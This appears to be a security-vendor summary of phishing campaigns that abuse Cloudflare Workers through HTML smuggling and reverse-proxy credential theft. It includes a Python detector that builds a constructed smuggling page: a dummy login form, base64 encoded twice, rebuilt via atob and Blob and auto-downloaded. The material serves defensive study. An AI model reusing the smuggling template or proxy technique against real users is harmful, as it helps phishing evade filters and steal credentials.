Netskope Threat Labs tracks phishing campaigns that abuse Cloudflare Workers. The campaigns employ two distinct techniques, HTML smuggling and transparent phishing, and are likely run by different attackers. They target Netskope users across Asia, North America, and Southern Europe, with a growing variety of hosting apps and a focus on Microsoft login credentials alongside other services. #CloudflareWorkers #HTMLSmuggling
Key points
- Two separate phishing campaigns use Cloudflare Workers: one uses HTML smuggling to evade network defenses, the other uses transparent phishing through a reverse proxy to capture credentials and tokens.
- HTML smuggling delivers the phishing page as an encoded blob and reconstructs it in the victim's browser, so inline inspection sees only opaque text and static detection is avoided.
- Transparent phishing acts as an adversary-in-the-middle proxy: it relays the victim's login data to the legitimate site so the sign-in succeeds, while harvesting credentials, session cookies, and tokens in transit.
- The number of distinct malicious apps hosted on Cloudflare Workers has continued to grow, with thousands of Netskope users targeted each quarter.
- Targets span Asia, North America, and Southern Europe, across tech, financial services, and banking sectors, with Microsoft login pages being a primary target and Gmail, Yahoo Mail, and cPanel Webmail also affected.
- Recommendations include inspecting all HTTP/HTTPS traffic, using URL filtering and threat protection, and considering Remote Browser Isolation for higher-risk sites.
MITRE Techniques
- [T1027] Obfuscated/Compressed Files and Information – HTML smuggling encodes phishing payloads to evade detection; ‘The phishing page is initially encoded in base64 and then encoded multiple additional times to obfuscate the code and avoid static detection.’
- [T1566] Phishing – Transparent phishing uses a proxy that collects credentials and forwards them to the legitimate site; ‘When victims enter their login credentials and multi-factor authentication code, the transparent phishing servers will collect and forward them to the target application, successfully logging the victim into the app while collecting credentials, cookies, and tokens along the way.’
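The two points above describe the encoding side of HTML smuggling: a phishing page is base64 encoded, wrapped in further encoding layers, and decoded client-side so that only opaque text crosses the wire. The following added example (written for this page, not code from Netskope or from the campaign) shows the defender's counterpart: a static triage routine that peels nested base64 out of long string literals in an HTML document and combines that with the JavaScript constructs smuggling pages rely on (atob, Blob, object URLs, a forced download click). The smuggled and benign sample documents, the dummy login form they carry, and the indicator list are all constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample content (not samples from the Netskope write-up). The dummy
# login form points at an .invalid domain so it cannot resolve anywhere.
FAKE_LOGIN_PAGE = (
    b"<html><body><form method='post' action='https://login.example.invalid/'>"
    b"<input name='user'><input name='pass' type='password'></form></body></html>"
)


def wrap_base64(data: bytes, layers: int) -> str:
    """Base64-encode `data` `layers` times; used only to build the sample page."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


# Constructed smuggling page: the payload is base64 twice over, decoded with
# atob() and handed to the browser through a Blob and an object URL.
SMUGGLED_HTML = f"""<html><body><script>
var p = "{wrap_base64(FAKE_LOGIN_PAGE, 2)}";
var d = atob(atob(p));
var b = new Blob([d], {{type: 'text/html'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(b);
a.download = 'invoice.html';
a.click();
</script></body></html>"""

BENIGN_HTML = "<html><body><p>Quarterly report</p></body></html>"

# JavaScript constructs that smuggling pages typically combine (assumed list).
SMUGGLING_INDICATORS = (
    "atob(", "new Blob(", "createObjectURL(", "msSaveOrOpenBlob(", ".download", ".click(",
)

# A quoted string literal long enough to carry a payload, made only of base64 characters.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")
B64_TEXT = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def peel_base64(blob: str, max_layers: int = 8) -> tuple[bytes, int]:
    """Decode nested base64 until the output stops looking like base64.

    Returns (innermost bytes, number of layers removed). The length check stops
    the loop on short innermost data that happens to be alphanumeric.
    """
    data = blob.encode("ascii")
    layers = 0
    while layers < max_layers and B64_TEXT.match(data) and len(data) % 4 == 0:
        try:
            data = base64.b64decode(data, validate=True)
        except binascii.Error:
            break
        layers += 1
    return data, layers


def analyze_html(html: str) -> dict:
    """Static triage of one HTML document for smuggling behaviour."""
    indicators = [i for i in SMUGGLING_INDICATORS if i in html]
    deepest = 0
    payload_is_html = False
    for literal in B64_LITERAL.findall(html):
        payload, layers = peel_base64(literal)
        deepest = max(deepest, layers)
        if layers and b"<html" in payload.lower():
            payload_is_html = True
    # Decoding primitives plus a long encoded literal is the combination worth escalating.
    suspicious = len(indicators) >= 2 and deepest >= 1
    return {
        "indicators": indicators,
        "layers": deepest,
        "payload_is_html": payload_is_html,
        "verdict": "suspicious" if suspicious else "clean",
    }


if __name__ == "__main__":
    for name, doc in (("smuggled", SMUGGLED_HTML), ("benign", BENIGN_HTML)):
        print(name, analyze_html(doc))
```

The routine is deliberately a triage signal rather than a verdict: legitimate pages also call atob() or build Blobs, so it escalates only when decoding primitives and a long encoded literal appear together, and it reports how many encoding layers it removed and whether the innermost payload is itself HTML, which is the detail an analyst wants before pulling the page into a sandbox or Remote Browser Isolation session.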
Indicators of Compromise
- [Domain] context – https://{application-name}.workers.dev (the template every hosted Workers app follows) and the parent domain workers.dev
- [URL] context – https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Phishing/CloudflareWorkers, and https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling